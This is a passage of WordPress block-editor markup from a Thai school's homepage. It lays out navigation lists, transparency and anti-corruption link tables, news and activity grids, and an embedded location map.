data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=605\" data-type=\"page\" data-id=\"605\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":503,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png\" alt=\"\" class=\"wp-image-503\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#ff6900\"} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?post_type=popupbuilder&amp;p=328\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=542\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=506\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=337\">Q&amp;A</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong>รายงานผลการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=680\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"bohtnagp\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showThumbnail\":false,\"showTaxonomy\":false,\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"showPagination\":true,\"titleTag\":\"h6\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"headingBgColor\":\"#ff6900\",\"titleHoverColor\":\"#ff6900\",\"titleBgColor\":\"#ffffff\",\"titleHoverBgColor\":\"#ffffff\",\"titleWeight\":\"500\",\"titlefStyle\":\"\",\"titleTran\":\"\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18}} /-->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#130b0b\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":3,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:paragraph {\"align\":\"center\",\"backgroundColor\":\"cyan-bluish-gray\",\"fontSize\":\"medium\"} -->\n<p class=\"has-text-align-center has-cyan-bluish-gray-background-color has-background has-medium-font-size\"><strong>แผนที่/ที่ตั้ง</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:image {\"id\":686,\"width\":\"auto\",\"height\":\"500px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full is-resized\"><img 